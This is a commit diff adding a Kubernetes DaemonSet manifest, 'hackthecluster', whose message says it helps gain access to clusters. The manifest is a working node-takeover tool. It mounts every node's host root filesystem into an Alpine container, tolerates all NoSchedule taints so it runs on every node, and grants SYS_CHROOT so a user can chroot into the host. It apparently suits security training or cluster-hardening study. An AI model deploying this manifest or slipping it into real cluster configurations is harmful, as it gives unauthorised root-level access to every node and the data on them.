🕵️ Add another YAML to help gain access to clusters

k8s/hackthecluster.yaml

@@ -0,0 +1,34 @@
+apiVersion: apps/v1
+kind: DaemonSet
+metadata:
+  name: hackthecluster
+spec:
+  selector:
+    matchLabels:
+      app: hackthecluster
+  template:
+    metadata:
+      labels:
+        app: hackthecluster
+    spec:
+      volumes:
+      - name: slash
+        hostPath:
+          path: /
+      tolerations:
+      - effect: NoSchedule
+        operator: Exists
+      containers:
+      - name: alpine
+        image: alpine
+        volumeMounts:
+        - name: slash
+          mountPath: /hostfs
+        command:
+        - sleep
+        - infinity
+        securityContext:
+          #privileged: true
+          capabilities:
+            add:
+            - SYS_CHROOT